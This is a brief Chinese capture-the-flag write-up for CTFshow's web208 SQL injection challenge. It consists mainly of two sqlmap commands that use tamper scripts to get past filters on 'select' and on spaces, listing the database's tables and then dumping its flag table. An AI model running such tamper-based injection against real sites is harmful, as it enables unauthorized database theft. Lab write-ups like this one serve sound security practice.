CTFshow-web208
对'select' 和 空格进行 过滤,一开始用了upppercase这个脚本,但之后发现sqlmap默认就是大写的SELECT似乎画蛇添足了 直接按照原来的命令也完全可以
python sqlmap.py -u "http://6f26b2b2-7b83-431e-aba9-122bd6d08b17.challenge.ctf.show/api/index.php" --method="PUT" --data="id=1" --
referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=1vrv4fg7q4uid8i1lhma043h20" --safe-url="http://6f26b2b2-7b83-
431e-aba9-122bd6d08b17.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=space2comment.py,uppercase.py -D ctfshow_web --tables
python sqlmap.py -u "http://5807fdc0-3463-4e3c-b9e7-4b9ef24bebb9.challenge.ctf.show/api/index.php" --method="PUT" --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=1vrv4fg7q4uid8i1lhma043h20" --safe-url="http://5807fdc0-3463-4e3c-b9e7-4b9ef24bebb9.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web211.py -D ctfshow_web -T ctfshow_flavia --dump

